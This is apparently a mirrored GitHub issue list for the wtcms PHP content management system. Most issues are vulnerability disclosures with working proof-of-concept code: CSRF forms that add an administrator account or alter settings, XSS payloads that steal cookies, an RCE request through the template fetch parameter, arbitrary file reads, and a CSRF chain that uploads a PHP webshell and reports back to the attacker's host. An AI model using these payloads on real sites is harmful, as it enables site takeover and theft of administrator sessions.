taosir / wtcms Goto Github PK
View Code? Open in Web Editor NEW基于thinkphp的内容管理系统,可快速搭建个人博客、公司学校官网、新闻类站点。
License: GNU Lesser General Public License v3.0
wtcms's People
Contributors
Stargazers
Watchers
Forkers
uqibu tiffeny ubilly gongzhengyang znlccy unix8net qaz734913414 houseyin erichuang2015 jxnuwzp wjp8057 laiyongqin sanseanking holdnewworld adymilk zhengjunqiang hong2351 henryleno devenlu vitooi chenxiaomanuser heycmm sahalashamo9527 jerrymouse7 sgseo eaglerlight tomorrowshipy qzhuhb xiyangkafeise guanshuyi dhstone kunsanw meizhinet laozajiang diff0815 mytfx mrcpf freezy2000 jianing1019 hongyonggan conquener yzbz wenjluo hyfgdcs 652165151wtcms's Issues
CSRF combines reflective XSS to obtain cookies
Reflective XSS exists in the administrator's page management office
In the search box, enter "><a src=" to trigger XSS
Reuse CSRF vulnerability to obtain cookies
POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/index.php?g=&m=admin_page&a=index" method="POST">
<input type="hidden" name="start_time" value="" />
<input type="hidden" name="end_time" value="" />
<input type="hidden" name="keyword" value=""><svg onload=alert(document.cookie)><a src="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
There is a RCE vulnerability in wtcms
wtcms is based on thinkcmf,but there is a RCE vulnerability has been exposed about thinkcmf in October(detail:https://www.freebuf.com/vuls/218105.html)。An attacker can execute any command by requesting ?a=fetch&content=<?php system('ping xxxxxx');?>
To demonstrate this vulnerability, we reproduce it via dnslog
after sending request above, we can get some dns query record on dnslog platform
besides, we can read any file by sending a request ?a=display&templateFile=README.md
we can change the value of templateFile to read any file.
配置完了一直保404请问怎么处理
按要求配置完毕一直是页面不存在
The background verification code size can be controlled to cause a denial of service attack.
1.Right click to view the verification code image address
2.Found width and height in the url
3.Use burpsuite to fetch data and see the size of the returned package
4.Try modifying the length and width values and seeing the size of the returned package
5.Through the above test, we know that the vulnerability exists. If we send a 10000 packet to the server and the server takes 10s to process, then if we send 10 10000 packets?
10x10 = 100s
That is, the server takes 100s to process. When we send 100 such packets (of course, you should never throw them with 100 packets. Generally speaking, 20-50 test results can lead to website crashes.)
Storage XSS was found in three places
Three storage XSS were found in wtcms
POC:
javascript:alert(document.cookie)
1.Click on the background article management and fill in the XSS code at the source of the article
Find the published article in the front desk and click on the link to trigger XSS
POC:
javascript:alert(document.cookie)
2.Click on the background menu management, fill in the XSS code at the link, and finally click save
Find the location where the XSS code is inserted in the foreground and click to trigger the XSS attack
POC:
javascript:alert(document.cookie)
3.Click on the background links, fill in the XSS code at the link address, and finally click Save
Find the link address at the bottom of the front desk and click to trigger XSS
Can getshell vulnerability
Getshell through three steps
- Open the following code file when the administrator is logged in.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<script type="text/javascript">
function post(url, fields) {
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack() {
var fields;
fields += "<input type='hidden' name='image[upload_max_filesize]' value='10240' />";
fields += "<input type='hidden' name='image[extensions]' value='=jpg,jpeg,png,gif,bmp4,php' />";
fields += "<input type='hidden' name='video[upload_max_filesize]' value='10240' />";
fields += "<input type='hidden' name='audio[upload_max_filesize%5' value='10240' />";
fields += "<input type='hidden' name='file[upload_max_filesize]' value='10240' />";
fields += "<input type='hidden' name='video[extensions]' value='mp4,avi,wmv,rm,rmvb,mkv' />";
fields += "<input type='hidden' name='audio[extensions]' value='mp3,wma,wav' />";
fields += "<input type='hidden' name='file[extensions]' value='txt,pdf,doc,docx,xls,xlsx,ppt,pptx,zip,rar' />";
var url = "http://192.168.1.2/index.php?g=admin&m=setting&a=upload_post";
post(url, fields);
}
window.onload = function () {
csrf_hack();
}
</script>
</body>
</html>
The above script can use the csrf to add a file with the suffix php in the whitelist of the uploaded image.
- Next, let the logged in administrator execute the following code script, which will upload a php script to /data/upload/admin/[date]/[filename].php, where the date is the file upload date, which is the script trigger date. The file name is php function uniqid() to execute the build.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest() {
var xhr1 = new XMLHttpRequest();
xhr1.open('GET', "http://127.0.0.1:5000/?timestamp=" + (new Date()).valueOf(), true);
xhr1.send(null);
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.1.2\/index.php?g=asset&m=asset&a=plupload", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------128712298613561");
xhr.withCredentials = true;
var body = "-----------------------------128712298613561\r\n" +
"Content-Disposition: form-data; name=\"name\"\r\n" +
"\r\n" +
"abc.php\r\n" +
"-----------------------------128712298613561\r\n" +
"Content-Disposition: form-data; name=\"app\"\r\n" +
"\r\n" +
"Admin\r\n" +
"-----------------------------128712298613561\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"abc.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php phpinfo();?\x3e\r\n" +
"-----------------------------128712298613561--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
window.onload = submitRequest();
</script>
</body>
</html>
In the above script, before uploading the php file, the script trigger timestamp will be sent to my host, let me know the script trigger time (prepare for the subsequent blast file name), followed by uploading a file, the content is obtained. Phpinfo();
- The script has been uploaded, and I got the timestamp when I uploaded the script, we will find it now.
After two hours of attack, I received the following good news.
Remote execution of the command succeeded
Has a CSRF vulnerability and can add an administrator account
After the administrator logs in, open the CSRF exp page.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/index.php?g=admin&m=user&a=add_post" method="POST">
<input type="hidden" name="user_login" value="hacker1" />
<input type="hidden" name="user_pass" value="hacker1" />
<input type="hidden" name="user_email" value="123@qq.com" />
<input type="hidden" name="role_id[]" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reflective XSS vulnerability exists in wtcms
Reflective XSS exists in keyword search area managed by administrator background articles
url:http://xxx.xxx.xxx/index.php?g=admin&m=index&a=index
POC
"><img/src=1 onerror=alert(document.cookie)><a src="
An issue was discovered in wtcms. Backstage friendship link file upload getshell.
Author: HTF
1.Login to the website background and click Settings -> Upload Settings
2.Then click on Extension Tools -> friendship Links
3.The default path of uploaded files is in \data\upload\admin\,and visit the file you just uploaded.
admin登录密码错误
你好,我试了输入admin的密码123456,但是显示密码错误。是密码改变了吗?谢谢
Csrf + Xss combination Can be obtained administrator cookie
Place of backstage set up website information exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the site information is automatically changed.
There is still an xss in the place of the website statistics code.
We can write an xss first, and then construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the administrator visits the homepage of the website, he can get him Cookie
CSRF Exp:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wtcms/index.php?g=admin&m=setting&a=site_post" method="POST">
<input type="hidden" name="options[site_name]" value="test" />
<input type="hidden" name="option_id" value="10" />
<input type="hidden" name="options[site_admin_url_password]" value="" />
<input type="hidden" name="options[site_tpl]" value="default" />
<input type="hidden" name="options[site_adminstyle]" value="flat" />
<input type="hidden" name="options[site_icp]" value="" />
<input type="hidden" name="options[site_admin_email]" value="" />
<input type="hidden" name="options[site_tongji]" value="<script>alert("test")</script>" />
<input type="hidden" name="options[site_copyright]" value="" />
<input type="hidden" name="options[site_seo_title]" value="�¿½�¸�»�¿½�¡�¿½" />
<input type="hidden" name="options[site_seo_keywords]" value="" />
<input type="hidden" name="options[site_seo_description]" value="" />
<input type="hidden" name="options[urlmode]" value="0" />
<input type="hidden" name="options[html_suffix]" value="" />
<input type="hidden" name="options[comment_time_interval]" value="60" />
<input type="hidden" name="cmf_settings[banned_usernames]" value="" />
<input type="hidden" name="cdn_settings[cdn_static_root]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
There is one CSRF vulnerability that can add news
You can add articles in admin background, but there is a CSRF vulnerability.
POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/cms/wtcms-master/index.php?g=admin&m=nav&a=add_post" method="POST">
<input type="hidden" name="cid" value="3" />
<input type="hidden" name="parentid" value="72" />
<input type="hidden" name="label" value="CSRF Test" />
<input type="hidden" name="nav" value="on" />
<input type="hidden" name="external_href" value="http://" />
<input type="hidden" name="target" value="" />
<input type="hidden" name="icon" value="" />
<input type="hidden" name="status" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
An issue was discovered in WTcms. there is an Backstage editor getshell Vulnerability
The attacker opens Setting - Mailbox configuration - Registration email template,upload the image through the editor, burbsuite capture the package and change the Suffix, you can upload any file.
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.